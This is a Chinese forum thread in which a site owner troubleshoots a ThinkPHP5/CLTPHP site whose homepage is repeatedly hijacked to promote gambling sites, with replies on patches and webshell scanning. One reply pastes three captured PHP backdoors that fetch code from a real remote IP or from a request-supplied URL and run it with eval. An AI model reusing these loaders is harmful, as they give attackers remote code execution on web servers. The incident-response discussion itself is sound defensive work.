基于 ThinkPHP5 的 cltphp 被搜索劫持,篡改首页的解决过程记录

近期我的一个企业站每天被篡改首页,index.php 被改为输出静态页,在meta中注入菠菜网站信息,搜索后点击直接跳菠菜网站,index.php 只读、getshell漏洞补丁都试过了,不管用。
cltphp 引用的TP官方的解决方案 https://show.cltphp.com/info/5/13.html , 试过无效;

@李山河

附言 1  ·  2周前

还是没解决,客户每次上传资料后都被攻击,不上传资料就没事。

附言 2  ·  2周前

附言1里面的每次上传资料就被攻击 失效,随机被攻击 ,可能不是同一个人攻击的

JeffLi
讨论数量: 9
JeffLi

经过对比文件:
1- 攻击者会写入与原文件名类似的文件,

file ,内容:

function s(){
    $contents = file_get_contents('http://67.198.186.42:29808/s/admine21.txt');
    a($contents);
}
function a($conn){
    $b = '';
    eval($b.$conn.$b);
}
s();

?>

或者

<?php $a = fopen('http://67.198.186.42:8889/ma/3699.txt', 'r');
$b = '';
while (false != ($c = fread($a, 8080))) {
    $b .= $c;
    echo $b ;
}
die();
print(eval($c = $b));
fclose($a); ?>

<?php
function _strint($key){
    return @file_get_contents($key);
}
function log1($log){
    lone(_strint($log));
}
function lone($key){
    $str = "";
    return eval($str.$key.$str);
}
foreach (array('_COOKIE','_POST','_GET') as $_request)
{
    foreach ($$_request as $_key=>$_value)
    {
        $$_key=  $_value;
    }
}
$id = isset($id) ? $id : 2;
log1($id);
?>

等各种类似的文件内容

3周前 评论
JeffLi

今晚我在恢复正常后,采取文章 https://blog.csdn.net/qq_39188306/article/... 的意见,近期看看是否还被攻击

3周前 评论
JeffLi

@JeffLi check 今天一天都没出问题 http://sdxrdcar.cn/home-clzs-info-id-72-ca...

3周前 评论
JeffLi

打卡,到现在四天没出问题啦~再遭受同种攻击应该不会中招了~

2周前 评论
JeffLi

@JeffLi 打上 TP5 官方补丁,然后锁死所有目录,除了 runtime、public

2周前 评论
JeffLi

这几天又被同类攻击得逞了,说明问题还是没解决,今天我更换了匹配规则
,按照这个改的 https://github.com/top-think/framework/com...

2周前 评论

我之前做我的网站是因为tp5的漏洞被篡改首页,用官网的方法打了补丁和网上的解决办法一样没用,估计是木马文件没删除干净,最后实在没辙我就先用WebShellKill这个软件查木马文件,让后下最新的tp5框架,把之前的程序移植过来,网站首页就再也没被篡改了。

2周前 评论
JeffLi

@wenxi 好的 我试一下哦~

2周前 评论
JeffLi

@wenxi WebShellKill 扫描有用吗。。

2周前 评论

请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!